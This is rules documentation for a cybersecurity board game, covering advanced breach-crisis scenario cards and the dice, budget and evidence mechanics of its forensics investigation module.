Vector: Breach compromises customers' data at YOUR company's data store
Primary Challenge: Managing responsibility for vendor compromise

Description: Investigation reveals attacker didn't target your company directly—they compromised a vendor you use: - Your company uses cloud storage vendor (e.g., competitor to AWS) - That vendor was breached - Attacker gained access to YOUR customer data stored at vendor - Question: Who is responsible? You? Vendor? Both?

Key Complications:
- Liability Question:
  - You're liable to customers (you selected vendor)
  - Vendor is liable (their security failure)
  - Customers might sue both
- Vendor Response:
  - Vendor may be uncooperative (deny liability)
  - Vendor may be bankrupt (vendor company collapse during breach)
  - Vendor may not investigate properly
- Notification Question:
  - Tell customers you chose bad vendor?
  - Or just notify about data breach without explaining vendor?
  - Either way looks bad
- Investigation:
  - Must investigate vendor (not your own systems)
  - Vendor may not cooperate
  - Limited forensic access (you don't control vendor systems)
  - Regulatory agencies may blame you anyway

Responsibility & Liability: - Customer lawsuits: "You failed to vet vendor properly" - Regulatory fines: "You failed to oversee third-party risk" - Vendor lawsuits: "Vendor refuses to pay damages" - Vendor bankruptcy: "Vendor can't pay, customers turn to you"

Team Decisions: 1. Blame vendor (legally risky, looks bad) 2. Share responsibility (legally safer, but costs more) 3. Quickly terminate vendor relationship (looks reactive) 4. Demand vendor pay for notification/remediation (vendor may refuse)

Special Events: - Turn 1: Discovery that vendor was breached - Turn 2: Vendor denies liability / claims it's your responsibility - Turn 3: Regulatory agency demands to know vendor details - Turn 4: First customer lawsuit against both you AND vendor - Turn 5: Vendor declares bankruptcy (can't pay damages)

Cost Implications: - Investigation into vendor: +8 Budget (forensics at vendor site) - Legal: +20 Budget (defending against liability claims) - Regulatory fines: Potentially full amount (you're still liable) - Customer lawsuits: Likely regardless of vendor's role - Vendor transition: +15 Budget (switch to new vendor, migrate data)

Communication Challenge: - Customers angry at you (you chose bad vendor) - Media: "Company failed to vet third-party security" - Regulatory: "Poor third-party risk management" - Board: "Why did we use this vendor?"

Difficulty (v2.2): - Investigation advances -5% (no direct access to vendor systems; minimum +5%) - Set aside 10 Budget at setup as a legal reserve (unavailable for actions) - Turn-5 Special Event: vendor declares bankruptcy — Board trust -10


SCENARIO-04: Insider Threat Revealed Mid-Crisis

Complexity: ADVANCED
Attacker: Current employee, not external hacker
Primary Challenge: Organizational trauma and trust collapse

Description: During investigation of external breach, forensic team discovers: - The "external breach" had help from insider - Employee provided attacker with access/credentials - Employee may have also exfiltrated data - Employee is still working at company (not yet caught)

Key Complications:
- Who is involved?
  - Single rogue employee?
  - Conspiracy (multiple employees)?
  - Which departments are involved?
- Motive:
  - Disgruntled employee selling data
  - Corporate espionage (hired by competitor)
  - Theft for personal gain
  - Political/ideological motivation
- Scope:
  - What other systems did insider compromise?
  - What data did they access/steal?
  - How long were they active?
  - Are there other insiders?
- HR/Legal:
  - Fire the employee immediately (risks legal action)
  - Continue employment while investigating (ethics question)
  - Involve law enforcement (police investigation)
  - Civil litigation from employee (wrongful termination claims)

Organizational Impact: - Trust in employees collapses - Morale plummets (people suspect each other) - Staff paranoia increases - Executive distraction (investigating insider)

Special Events: - Turn 2: Forensics discovers insider involvement - Turn 3: HR/Legal team must decide: fire or investigate? - Turn 4: If fired, wrongful termination lawsuit likely - Turn 4: If not fired, employee may destroy more evidence - Turn 5: Law enforcement investigation (if reported to police)

Team Decisions: 1. Immediately fire employee (legal risk but stops damage) 2. Continue employment while investigating (ethical but risky) 3. Involve law enforcement (criminal investigation, slow) 4. Settle potential lawsuits preemptively (expensive)

Investigation Complexity: - Cannot trust employee's explanations - Must verify what employee had access to - Must recover deleted data/logs - Must interview other employees - Investigation takes much longer (suspicious of everyone)

Cost Implications: - Extended forensics: +15 Budget (investigating employee) - Legal: +25 Budget (employment law, potential settlements) - HR investigation: +8 Budget (interview staff, background checks) - Remediation: +20 Budget (credential reset, system rebuild) - Potential lawsuit: Millions if significant

Communication Challenge: - Cannot publicly disclose insider involvement (defamation risk) - Regulators and customers demand explanation - Media: "Company had insider threat" - Board: "Why was security so bad?"

Difficulty (v2.2): - Investigation advances are halved until Investigation reaches 50% (internal accounts cannot be trusted) - Executive trust starts at 60% (instead of 80%) - ACTION-08 (Credential Reset) is effectively mandatory — if not completed by end of Turn 6, EVENT-08 (Second Breach) fires automatically


SCENARIO-05: Critical Infrastructure Breach (Safety/Lives at Risk)

Complexity: ADVANCED+
Sector: Utilities, Healthcare, Transportation, Manufacturing
Primary Challenge: Physical safety takes priority over cybersecurity response

Description: Breach affects critical infrastructure where compromise could cause physical harm: - Healthcare: Hospital network compromise during surgery (patient safety risk) - Utilities: Power grid compromise during storm (people without power/heat) - Transportation: Traffic system compromise (accidents possible) - Manufacturing: Production system compromise (equipment failure)

Key Complication: Safety > Security - Cannot shut down system for forensics if people are harmed - Cannot remediate if it requires system downtime - Incident response must preserve operational safety - Balances security investigation with operational continuity

Regulatory Escalation: - CISA (Cybersecurity and Infrastructure Security Agency) involved immediately - National Incident Command System (NICS) may take over - Government mandates response (not optional) - Military/intelligence agencies may be involved - Cannot investigate without government approval

Special Considerations: - Lives are at stake (not just data) - Response priorities are: Safety → Containment → Investigation - Traditional forensics may be impossible (system must stay operational) - Attacker knows system is critical (leverage for negotiation)

Special Events: - Turn 1: CISA declaration of critical infrastructure incident - Turn 2: Government takes partial control of response (may override company decisions) - Turn 3-4: Attacker threatens system shutdown (extortion using safety risk) - Turn 5: Coordinated media/government briefings (national security implications)

Team Decisions: 1. Continue operations (risk of safety incident) or shut down (risk to people without service)? 2. Engage with government agencies (lose control of response) 3. Negotiate with attacker (payment may violate OFAC sanctions if the actor is sanctioned; government will weigh in) 4. Accept potential service interruption (for safety)

Cost Implications: - Immediate government response: +50 Budget (federal agencies) - Operational impact: Unknown (depends on what breaks) - Remediation: Cannot shut down system (very limited options) - Investigation: Deferred (safety is priority) - National security classification: Investigation may be classified (cannot discuss publicly)

Communication Challenge: - Cannot disclose security details (national security) - Cannot disclose full scope (might encourage copycat attacks) - Public panic risk (if people know infrastructure is vulnerable) - Media cannot report full details (government requests)

Difficulty (v2.2): - Remediation advances are halved (systems must stay operational — no downtime allowed) - Communication advances -5% (national security disclosure restrictions; minimum +5%) - ACTION-13 PAY is unavailable (government prohibits payment) - Turn-1 Special Event: CISA declaration — Regulator trust starts at 50% but ACTION-10 gives +25 instead of +20 (cooperation is rewarded)


SCENARIO-06: Stock Price Crash (Public Company Panic)

Complexity: ADVANCED
Trigger: Negative media coverage + analyst downgrades
Primary Challenge: Managing financial crisis alongside security crisis

Description: Public company stock price crashes following breach announcement: - News of breach announced - Stock drops 10-20% in first day - Short-sellers amplify negative sentiment - Analysts downgrade stock rating - Institutional investors sell (panic selling) - Stock drops 30-50% or more

Key Complications:
- Financial Crisis:
  - Company loses market value ($1B+ in some cases)
  - Credit rating downgrade possible
  - Difficulty accessing credit markets
  - Acquisition at depressed price possible
- Board/Shareholder Panic:
  - Shareholders demand CEO removal
  - Board may fire executives immediately
  - Board may accept lowball acquisition offer
  - Media coverage of internal turmoil
- Business Disruption:
  - Employee morale crashes (stock is part of compensation)
  - Key employees leave (seeking more stable companies)
  - Customer confidence drops
  - Supplier payment delays (credit rating issue)
  - Business slows due to loss of employee focus

Investor Psychology: - Fear-driven selling (stock is "falling knife") - Rumors spread (company is bankruptcy risk) - Technical traders amplify selling (algorithmic trading) - Recovery takes months/years even if breach is minor

Special Events: - Turn 1: Stock drops 20% (breach announcement) - Turn 2: Analyst downgrades (stock drops another 15%) - Turn 3: Media "Death Spiral" narrative ("Company Doomed") - Turn 4: Short-seller report (negative narrative amplified) - Turn 5: Activist investor demands board change - Turn 6: Acquisition offer from vulture investor (lowball) - Turn 7: Board may accept acquisition (loses independence)

Team Decisions: 1. Focus on crisis response (stock takes care of itself) 2. Spend effort on investor relations (PR effort) 3. Respond to activist pressure (appeasement or defiance?) 4. Accept acquisition offer or fight it?

Indirect Crisis Complications: - Cannot spend freely on response (stock-based credit) - May need to cut crisis response budget (unexpected) - Board becomes distracted (shareholder meetings, hostile negotiations) - Executives leave (job market is competitive) - Crisis response effectiveness drops

Cost Implications: - Investor relations campaign: +10 Budget - Board/shareholder meetings: Distraction (-10 effectiveness) - Potential acquisition: Loss of independence - Employee departures: Loss of key expertise - Credit access: May be restricted (raises costs)

Communication Challenge: - Must manage investor narrative (balance hope + realism) - Must appear competent (or stock collapses more) - Media attention is intense (every statement scrutinized) - Cannot show weakness (stock market punishes)

Difficulty (v2.2): - Board trust starts at 50% (instead of 70%) - Budget -10 at setup (credit crunch) - EVENT-09 (Shareholder Pressure) fires at Turn 3 AND Turn 5 (it is scheduled twice this game)


SCENARIO-07: Ransomware + Data Breach + Business Email Compromise

Complexity: ADVANCED+
Multiple Simultaneous Compromises: Systems encrypted + data stolen + email account compromised
Primary Challenge: Responding to multiple attack objectives simultaneously

Description: Not a single attack but multiple overlapping compromises: 1. Ransomware: File servers encrypted (production stops, cannot access files) 2. Data Breach: Database stolen (customer data exfiltrated) 3. Email Compromise: CEO's email account compromised (attacker can send as CEO)

Key Complications:
- Attacker has multiple leverage points:
  - "Pay ransom or systems stay encrypted" (operational pressure)
  - "Pay to prevent data publication" (financial/reputational pressure)
  - "Stop responding or we'll send fake CEO email" (social engineering pressure)
- Investigation difficulty:
  - Multiple attack vectors to investigate
  - May be different attackers or coordinated campaign
  - Each compromise has different timeline
  - Cannot determine if attacks are related or independent
- Remediation priorities clash:
  - Decrypt systems immediately (get operations back)
  - Recover stolen data (prevent publication)
  - Secure CEO email account (prevent further compromise)
  - Cannot do all three at once (budget/time constraints)

Special Complications:
- Fake CEO Email Risk:
  - Attacker sends email as CEO
  - "Approves" emergency spending
  - "Authorizes" data transfers
  - "Orders" employee actions
  - Teams cannot tell if email is real
- Timeline Acceleration:
  - Email compromise creates urgency
  - Attacker can impersonate executives
  - Must immediately notify all employees
  - Breach of trust (employees distrust CEO emails)

Special Events: - Turn 1: Discovery of ransomware + data breach - Turn 2: Discovery of CEO email compromise - Turn 3: Fake CEO email sends "emergency transfer" (employees confused) - Turn 4: Attacker threatens to send more fake emails (escalation) - Turn 5: Ransom deadline, data publication deadline, email account deadline (all converging)

Investigation Complexity: - Three separate forensics investigations (expensive) - Each compromise requires different approach - Timelines may overlap (more complexity) - May be related (same attacker) or unrelated (unlucky)

Cost Implications: - Triple forensics: +20 Budget (investigating all three) - Triple ransom/extortion demands: $10M+ total - Remediation: +25 Budget (rebuild files, backup, email security) - Communication: +15 Budget (notifying employees about fake emails) - Regulatory fines: Stacked (multiple breach types)

Team Decisions: 1. Which compromise to prioritize? (Cannot fix all simultaneously) 2. Pay multiple ransoms or negotiate single amount? 3. How to prevent fake CEO emails during investigation? 4. How to rebuild trust after email compromise?

Communication Challenge: - Must warn employees about fake emails (careful wording) - Cannot fully disclose CEO email compromise (executive embarrassment) - Must appear to have control (or stock crashes) - Media narrative: "Multiple breaches mean security is very bad"

Difficulty (v2.2): - +2 turns of events: EVENT-08 (Second Breach) is pre-armed and fires automatically at Turn 6 (once) — the game runs 10 turns - All track advances -5% (three simultaneous investigations; minimum +5%) - The ransom deadline covers all three extortion threats — one ACTION-13 decision resolves them together


SCENARIO-08: Breach During Merger/Acquisition (Regulatory + Deal Complications)

Complexity: ADVANCED+
Context: Breach happens while company is being acquired or merging
Primary Challenge: Managing breach while deal dynamics change

Description: Breach is discovered during critical phase of M&A transaction: - Company announced acquisition/merger - Deal close in 30-45 days - Due diligence is underway (acquirer evaluating company) - Breach discovered mid-deal - Acquirer may walk away (reduces deal value or terminates) - Regulators may block deal (antitrust, security concerns)

Key Complications:
- Deal Dynamics:
  - Acquirer discovers breach during due diligence
  - Acquirer may lower offer price (leverage)
  - Acquirer may demand warranty/escrow (financial penalty)
  - Deal may fail entirely (destroys shareholder value)
- Information Control:
  - Acquirer has limited information (still under NDA)
  - Seller has incentive to minimize breach
  - Acquirer has incentive to maximize perceived severity
  - Buyer/seller information asymmetry complicates response
- Regulatory Issues:
  - Merger may be blocked for security concerns
  - FTC may demand security improvements (delay deal)
  - State regulators may oppose merger (security risk)
  - Deal timing already tight (additional scrutiny delays close)
- Board Pressure:
  - Board wants to preserve deal value
  - May demand minimal response (to not disclose full scope)
  - May pressure executives to downplay breach
  - Creates pressure for inadequate response

Timeline Pressure: - Deal must close in 30-45 days - Breach response takes time - Regulatory review adds time - Conflicting priorities: Deal vs. Response

Special Events: - Turn 1: Breach discovered, acquirer learns in due diligence - Turn 2: Acquirer threatens to walk away (leverage) - Turn 3: Price renegotiation (acquirer lowers offer 10-20%) - Turn 4: Regulatory delay (FTC requests documents) - Turn 5: Deal extension negotiations (need more time for breach response) - Turn 6: Shareholder lawsuit (shareholders allege breach was hidden)

Team Decisions: 1. Full disclosure to acquirer (cooperation but deal value drops) 2. Minimal disclosure (preserve deal but fraud risk) 3. Separate negotiation: breach response vs. acquisition terms 4. Push for deal delay (to respond properly to breach)

Complex Incentives:
- Company wants:
  - Deal to close at good price
  - Breach to be minimized
  - Acquirer to handle breach remediation
- Acquirer wants:
  - Full disclosure of breach
  - Lower price to account for risk
  - Warranties that seller covers breach costs
- Regulators want:
  - Full investigation
  - Breach remediation
  - Assurance of future security
  - May block if combined entity is too powerful

Cost Implications: - Breach response: Standard costs (+20-30 Budget) - Deal renegotiation: Millions in lost value - Regulatory review: Delays (may block deal) - Shareholder lawsuit: If breach was hidden, liability - Escrow/warranty: Seller may have to hold money as security

Communication Challenge: - Cannot disclose full breach details (acquirer has leverage) - Cannot hide breach (fraud risk) - Must negotiate simultaneously with acquirer + regulators + investigators - Media discovery complicates (stock price pressure)

Difficulty (v2.2): - Communication advances are halved (every statement is reviewed by two legal teams) - Board trust starts at 50% (deal-preservation pressure to under-respond) - Turn-3 Special Event: price renegotiation — Board trust -10 if Investigation is below 25% (the board can't answer the acquirer's questions)


Advanced Scenarios Summary

| Scenario | Challenge | Difficulty | Key Pressure |
|---|---|---|---|
| SCENARIO-01 | Multi-Region Legal | HIGH | 3 different regulatory timelines |
| SCENARIO-02 | Ransomware Extortion | HIGH | $10M decision + data publication threat |
| SCENARIO-03 | Supply Chain Liability | HIGH | Vendor failure, customer trust |
| SCENARIO-04 | Insider Threat | HIGH | Organizational trust collapse |
| SCENARIO-05 | Critical Infrastructure | EXTREME | Lives at risk, government control |
| SCENARIO-06 | Stock Crash | HIGH | Financial crisis + board pressure |
| SCENARIO-07 | Triple Compromise | EXTREME | 3 simultaneous attacks, multiple ransoms |
| SCENARIO-08 | M&A Complications | EXTREME | Deal value + regulatory blocks |

Gameplay Recommendations

When to Use Advanced Scenarios

Use if: - Playing with experienced crisis management teams - Want sophisticated, realistic scenarios - Have time for complex decision-making (add 20-30 min per scenario) - Want to teach cascading effects of bad decisions

Skip if: - Playing with beginners (too complex) - Want simpler, faster gameplay - Limited time available - Focus is on learning basics

Scenario Selection Strategy

Start with easier scenarios: 1. SCENARIO-01 (Multi-Region): Complex but straightforward 2. SCENARIO-02 (Ransomware): Familiar from news, clear choices 3. SCENARIO-04 (Insider): Interesting organizational dynamics

Progress to harder scenarios: 4. SCENARIO-03 (Supply Chain): Adds liability complexity 5. SCENARIO-06 (Stock Crash): Financial crisis layer

Reserve for expert play: 6. SCENARIO-05 (Critical Infrastructure): Government involvement changes everything 7. SCENARIO-07 (Triple Compromise): Multiple simultaneous crises 8. SCENARIO-08 (M&A): Extreme complexity, conflicts of interest


Print Instructions

  1. Print on cardstock (250 gsm minimum)
  2. Use distinct coloring by complexity level:
     - Orange (Advanced): SCENARIO-01 to SCENARIO-04
     - Red (Advanced+): SCENARIO-05, SCENARIO-06
     - Dark Red (Extreme): SCENARIO-07, SCENARIO-08
  3. Include warning icons (exclamation mark for extreme scenarios)
  4. Include difficulty rating on card
  5. Cut along dotted lines
  6. Create a "Scenario Difficulty Guide" for selecting appropriate scenarios

Possible Future Advanced Scenarios


Disaster Recovery Module: Advanced Crisis Scenarios (Expansion) Part of Incident Zero, a modular cybersecurity board game v2.2 - Playtest Edition

docs/rules/module-forensics.md

Forensics Module: Rules & Mechanics

Version: 2.2 - Playtest Edition (rule changes marked "(v2.2)"; see v2.2 Playtest Edition Changes)
Last Updated: July 2026


Module Overview

The Forensics Module teaches incident investigation, digital forensics, and attack attribution. This module is typically entered after Incident Response or Disaster Recovery (representing the investigation phase of response) but can also be played standalone to teach forensic analysis concepts.

Rather than detecting the attack or managing the crisis, Forensics focuses on the crucial post-breach investigation phase: - Evidence collection and preservation - Timeline reconstruction of attacker actions - Attack chain analysis linking findings to MITRE ATT&CK techniques - Attribution and threat intelligence (who did this and how?) - Attack surface analysis (how did they get in?) - Lessons learned for future hardening and network building

Educational Purpose

  - Incident Response: Teaches proactive threat detection
  - Hardening (typically after an IR win): Teaches proactive defense
  - Disaster Recovery (typically after an IR loss): Teaches crisis management
  - Forensics (after IR or DR): Teaches investigation and learning

Forensics can also be played standalone to teach forensic methodology without the preceding modules.


Module Purpose & Integration

When Forensics Occurs

In Campaign Play:
  1. After Incident Response failure (undetected breach) → Forensics Phase
  2. After Disaster Recovery (crisis management) → Forensics Phase
  3. After Hardening success (discovered attack) → Optional Forensics for deeper learning

In Standalone Play:
  - Forensics module can be played independently as a 45-90 minute investigation scenario

Forensics Feeds Into Other Modules

Outputs from Forensics:
  - Attack Chain Reconstruction: Detailed understanding of how attacker progressed
  - Vulnerability Discovery: Systems and methods exploited
  - Threat Intelligence: IOCs (Indicators of Compromise), malware samples, attacker infrastructure
  - Timeline Evidence: When each compromise occurred

Used In:
  - Hardening Module: "Build defenses against the techniques discovered in forensics"
  - Network Building Module: "Redesign network architecture knowing how attacker pivoted"
  - Audit & Compliance Module: "Assess coverage of controls that should have detected forensic findings"


Forensics Module Setup

Prerequisites for Forensics Phase

Trigger Options:

  1. Sequential (After IR/DR): Team completed Incident Response or Disaster Recovery
     - Card descriptions reveal attack chain that was discovered or undetected
     - Blue Team now investigates for attribution and deeper understanding

  2. Standalone Setup: Team starts fresh investigation (no prior IR/DR)
     - Threat Orchestrator secretly selects 1-2 complete attack chains
     - Blue Team investigates to discover and reconstruct the attack

Discovery & Revelation (Sequential Play)

When entering Forensics after IR or DR, the Threat Orchestrator reveals the attack context:

Example (After IR Success): "Your security team detected and contained an attack chain:
  1. Phishing email (SOCIAL ENGINEERING)
  2. Credential harvesting malware (MALWARE)
  3. Lateral movement to admin account (CREDENTIAL ABUSE)

Now you investigate to understand: How deep did they get? Are there other persistence mechanisms? Can we attribute this to a known threat group?"

Example (After DR/IR Failure): "Forensic examination of compromised systems reveals:
  1. Initial access via credential stuffing (CREDENTIAL ABUSE)
  2. Privilege escalation via unpatched service (WEB EXPLOIT)
  3. Persistence through scheduled task modification (MALWARE)
  4. Data exfiltration via DNS tunneling (DATA EXFIL)

Now you reconstruct the complete timeline and attribute the attack."


Forensics Module Components

Card Types Specific to Forensics

Investigation Action Cards (12 cards)

These represent forensic investigation techniques and evidence collection methods.

Standard Investigation Actions:

| Card | Technique | DC | Cost | Time | Result |
|---|---|---|---|---|---|
| DISK-01 | Disk Image & Analysis | 12 | 10 | 2 turns | Recover deleted files, malware samples |
| DISK-02 | File System Carving | 14 | 15 | 3 turns | Deep file recovery, hidden artifacts |
| MEM-01 | Memory Dump & Analysis | 13 | 15 | 2 turns | Volatile process info, injected code |
| MEM-02 | Memory Forensics Deep Dive | 15 | 20 | 3 turns | Malware behavior, command-and-control |
| LOG-01 | Event Log Analysis | 11 | 5 | 1 turn | Timeline of user actions, logins |
| LOG-02 | Deep Log Correlation | 13 | 10 | 2 turns | Cross-system timeline, attack sequence |
| NET-01 | Network Traffic Analysis | 12 | 10 | 2 turns | Exfiltration evidence, C2 communications |
| NET-02 | Packet Capture Deep Analysis | 14 | 15 | 3 turns | Protocol-level forensics, attacker tools |
| MALW-01 | Malware Analysis (Dynamic) | 12 | 15 | 2 turns | Behavior analysis, IOCs |
| MALW-02 | Malware Analysis (Static) | 14 | 10 | 2 turns | Code reverse engineering, capabilities |
| TIMELINE-01 | Timeline Reconstruction | 13 | 5 | 1 turn | Chronological attack sequence |
| THREAT-01 | Threat Attribution Analysis | 15 | 20 | 3 turns | Link to known groups, TTPs |

DISK-01 rush option (v2.2): pay +5 Budget (15 total) to run it at Duration 1.

Investigation Action Card Structure:
  - Title: e.g., "Disk Image & Analysis"
  - Technique: MITRE ATT&CK reference (e.g., "Forensic Analysis")
  - Difficulty Class (DC): Roll d20+modifiers vs. this number to succeed
  - Cost: Budget required to perform investigation
  - Duration: Number of turns this investigation takes
  - What It Reveals: Type of evidence discovered (see Evidence Cards below)
  - Success Condition: d20+forensics_skill vs. DC (11+ usually succeeds, but higher DC cards reward skilled investigators)

Investigation Duration (v2.2): Starting an investigation with Duration N occupies your action on the turn you start it (pay the Budget cost then). Count the turn you start it as turn 1: the results (evidence + meter advances) arrive — and the roll is made — at the START of turn N. So Duration 1 resolves immediately on the same turn; Duration 2 resolves at the start of the following turn; Duration 3 resolves two turns after starting. Only ONE multi-turn (Duration 2+) investigation may be in flight at a time, but you may take other actions (Analyze Evidence, Follow Lead, or a Duration 1 investigation) while waiting.


Evidence Cards (12 cards)

These represent specific findings from investigations. They document what was discovered and provide investigative leads.

Categories of Evidence (core deck counts):

A. Malware & Persistence (4 cards: EVD-01, EVD-03, EVD-08, EVD-10)
  - Trojan samples with capabilities (spyware, RAT, backdoor)
  - Persistence mechanisms (scheduled tasks, registry modifications, startup folders)
  - Encryption keys recovered from malware or memory
  - Malware behavior profiles from sandbox analysis

B. Credentials & Access (1 card: EVD-04)
  - Admin account compromise timeline
  - Suspicious logins from unusual times, locations, or sources

C. Lateral Movement (1 card: EVD-05)
  - Pass-the-hash evidence
  - Tools used for pivoting
  - Systems accessed with each credential

D. Exfiltration (1 card: EVD-06)
  - Volume of data exfiltrated
  - File types extracted
  - Destination IP addresses or domains
  - Timing of exfiltration windows

E. Attack Infrastructure (2 cards: EVD-02, EVD-07)
  - Command-and-control servers
  - Malware staging servers
  - Registrar information (domain registration)
  - ASN and geolocation data

F. Attack Activity (3 cards: EVD-09, EVD-11, EVD-12)
  - Attacker command history
  - File staging artifacts (what was collected before exfiltration)
  - Anti-forensics evidence (log deletion, timestamp manipulation)

Evidence Card Structure:
  - Title: Specific finding (e.g., "Credential Dumper Malware")
  - Type: Category (Malware, Persistence, Credentials, Movement, Exfiltration, Infrastructure, Timeline)
  - MITRE ATT&CK Technique: Referenced technique (e.g., T1003 - OS Credential Dumping)
  - Description: What was found and where
  - Investigation Source: Which Investigation Action card led to this
  - Investigative Lead: What the Blue Team can do with this information
  - Connection to Attack Chain: Links back to specific Threat cards from IR phase (if sequential)


Findings Cards (4 cards)

These represent the conclusions of the forensic investigation and feed into recommendations.

Finding Types:

| Finding | Description | Feeds Into Module |
|---|---|---|
| FIND-01: Threat Attribution Report | Identified attacker group, techniques, motivations | Hardening, Audit & Compliance (threat model), Incident Response |
| FIND-02: Attack Surface Analysis | Systems/methods exploited; entry points identified | Network Building, Hardening, Audit |
| FIND-03: Persistence Mechanisms Discovered | How attacker maintained access; backdoors identified | Hardening (remove persistence), Disaster Recovery, Audit |
| FIND-04: Investigative Gaps & Recommendations | Questions answered vs. remaining; next steps | Audit & Compliance (post-incident review), Training |

Game Materials Required (Forensics-Specific)

Physical Components:
  - Investigation Action cards (12 cards)
  - Evidence cards (12 cards)
  - Findings cards (4 cards)
  - Turn Tracker (8-15 turns typical)
  - Budget Tracker (Investigation budget: 0-100)
  - Progress Meters (see below):
    - Timeline Completeness (0-100%)
    - Attack Chain Reconstruction (0-100%)
    - Attribution Confidence (0-100%)
    - Evidence Chain of Custody (0-100%)

Optional:
  - Investigation Flow Chart (showing how actions lead to evidence discovery)
  - MITRE ATT&CK Technique reference sheet
  - Evidence correlation board (physical board or spreadsheet linking evidence)


Forensics Module Mechanics

Game Length & Difficulty

Turn Structure:
  - Easy (TIER 1): 6-8 turns | Simple attack, few pivot points, obvious artifacts
  - Medium (TIER 2): 8-10 turns | Standard breach with some obfuscation
  - Hard (TIER 3): 11-13 turns | Complex attack, sophisticated attacker, limited logging
  - Expert (TIER 4): 14-15 turns | APT-level sophistication, anti-forensics measures, encrypted communications

Turn Length Determination: Using the Variable Turn Length System (see Core Rules):
  1. Threat Orchestrator selects attack complexity tier
  2. Roll d4 for variation (-1, 0, 0, +1)
  3. Announce final turn count to Blue Team

Investigation Budget:
  - Starting Budget: 75 (represents forensic lab time, tools, personnel)
  - Optional Bonus: +25 if company has cyber insurance or threat intelligence subscription
  - Budget Tracker Range (v2.2): 0-100 (75 base + 25 optional bonus is the maximum starting value)


Action System

Each turn, the Blue Team performs ONE of these actions:

Action A: Conduct Investigation 🔍

Description: The team describes a specific forensic investigation they want to perform.

Mechanics:
  1. Choose Investigation Card: Select from available Investigation Action cards (Disk, Memory, Logs, Network, Malware, Timeline, or Attribution)
  2. Pay Cost: Spend Budget equal to card cost (paid on the turn you start the investigation)
  3. Resolve Duration (v2.2): If Duration is 2+, the roll and results wait until the START of the turn the investigation completes (see Investigation Duration rule above)
  4. Roll: d20 + relevant skill modifier vs. Difficulty Class on card
     - Modifiers:
       - +2 if team has forensics background
       - +1 if prior Investigation Action revealed clues to this technique
       - +1 if team provides detailed narrative explanation of investigation approach
       - -2 if investigation is being done hastily (using extra turn pressure to rush)
  5. Check Results:
     - Success (roll ≥ DC): Discover ONE Evidence card — unless the card says otherwise (v2.2: MEM-02 and NET-02 award TWO) — and apply that Evidence card's printed meter impacts (see No Double Counting, Rule 5)
     - Partial Success (roll DC-2 to DC-1): Discover PARTIAL Evidence (partial timeline, hints of compromise, etc.) and apply the investigation card's partial-success advance line
     - Failure (roll < DC-2): No Evidence discovered this turn; Budget still spent

Progress Meter Advancement: Each successful Investigation Action advances one or more Progress Meters. Typical advances are +5-35% per meter (major breakthroughs can exceed +20%):
  - Timeline Completeness (+5-35%): Evidence that establishes temporal sequence
  - Attack Chain Reconstruction (+5-35%): Evidence linking attacker actions together
  - Attribution Confidence (+5-35%): Evidence pointing to threat actor identity
  - Evidence Chain of Custody: advances via the Chain of Custody rule (v2.2, Rule 1) and the printed impacts on some Evidence cards

Example Investigation:

Blue Team: "We want to conduct a disk image and analysis of the compromised server."
Cost: 10 Budget (paid now). DISK-01 has Duration 2, so the team's action this turn is starting the imaging; results arrive at the start of the next turn.
DC: 12
Blue Team Roll (at the start of the next turn): d20 + 2 (forensics background) = 15
Result: Success! Discover evidence card EVD-01 "Credential Dumper Malware" and apply its printed impacts: Attack Chain +15%, Attribution +10%, Timeline +10%. The team states the binary was hashed (SHA-256) before analysis: Chain of Custody +5% (v2.2)


Action B: Analyze Existing Evidence 📊

Description: The team reviews evidence cards already discovered and makes connections.

Cost (v2.2): 5 Budget. Each Evidence card can be Analyzed only once (v2.2) — mark cards as Analyzed when they are included in this action.

Mechanics:
  1. Pay Cost: Spend 5 Budget (v2.2)
  2. Review Evidence: Team looks at 2-4 not-yet-Analyzed Evidence cards already discovered
  3. Make Connection: Team describes how findings are related (temporal, technical, or attribution-based)
  4. Roll: d20 + relevant skill vs. DC 10
     - Modifiers:
       - +2 if team connects 3+ evidence cards in coherent narrative
       - +1 if connection references specific MITRE ATT&CK technique
  5. Check Results:
     - Success (roll ≥ 10): Gain insight; advance two Progress Meters by 5-10% each
     - Failure (roll < 10): No progress; action still costs a turn (represents time spent on dead-end analysis)

Example Analysis:

Blue Team: "The malware sample found in memory matches the persistence mechanism in the scheduled task, suggesting the attacker uploaded the same tool twice. This indicates they knew what they were doing and weren't just randomly exploring."
Roll: d20 + 2 (good narrative) = 16
Result: Success! +10% Attribution Confidence (skilled attacker), +10% Attack Chain Reconstruction (coordinated multi-stage attack)


Action C: Follow Investigative Lead 🔗

Description: Based on existing evidence, the team pursues a specific investigative thread.

Cost (v2.2): 5 Budget (printed cost for every Follow Investigative Lead action).

Mechanics:
  1. Pay Cost: Spend 5 Budget (v2.2)
  2. Choose Evidence Card: Pick an Evidence card with an "Investigative Lead"
  3. Describe Approach: How will the team pursue this lead? (e.g., "Track the C2 domain to registrar records to find other registered domains")
  4. Roll: d20 + relevant skill vs. DC (varies 11-14 depending on lead)
  5. Check Results:
     - Success: Discover a new Evidence card directly related to the lead and apply its printed meter impacts (v2.2: if no suitable undiscovered Evidence card exists, advance Attribution Confidence +20% instead — never both)
     - Partial Success: Discover related evidence but get a false lead (discover 1 Evidence + 1 Red Herring card)
     - Failure: Dead-end lead; use turn without discovering evidence

Example Lead:

Evidence Card: "Command-and-Control Communications (IP: 203.0.113.45)"
Investigative Lead: "Perform ASN and WHOIS lookup to find other infrastructure operated by this attacker"
Blue Team: "Let's trace the IP's ASN and registrar records to find other malicious domains."
Cost: 5 Budget (v2.2)
Roll: d20 + 1 (good idea) = 14 vs. DC 12
Result: Success! Discover EVD-07 "Attacker Infrastructure Map" and apply its printed impacts: Attribution +30%, Attack Chain +15%, Timeline +10%. Team documents WHOIS/passive-DNS exports: Chain of Custody +5% (v2.2)


Victory & Failure Conditions

Investigation Complete (Victory)

The Blue Team achieves ONE of these:

Victory Condition 1: "Full Attribution"
  - Attribution Confidence ≥ 90% AND Timeline Completeness ≥ 80%
  - Outcome: "Your investigation successfully attributes this attack to [Known Threat Group]. Security intelligence briefing prepared."

Victory Condition 2: "Solid Case"
  - Timeline Completeness ≥ 80% AND Attack Chain Reconstruction ≥ 80% AND Evidence Chain of Custody ≥ 70%
  - Outcome: "Your forensic report is publishable quality and defensible in court. Law enforcement briefed."

Victory Condition 3: "Partial Findings"
  - Any two Progress Meters ≥ 70% at game end
  - Outcome: "Investigation concluded. Findings are actionable for hardening and threat intelligence."

Investigation Inconclusive (Failure)

Precedence (v2.2):
  - Victory conditions are always checked FIRST. The old "any meter < 40% = failure" clause is DELETED (it conflicted with Victory Condition 3): a low meter never overrides a met victory condition.
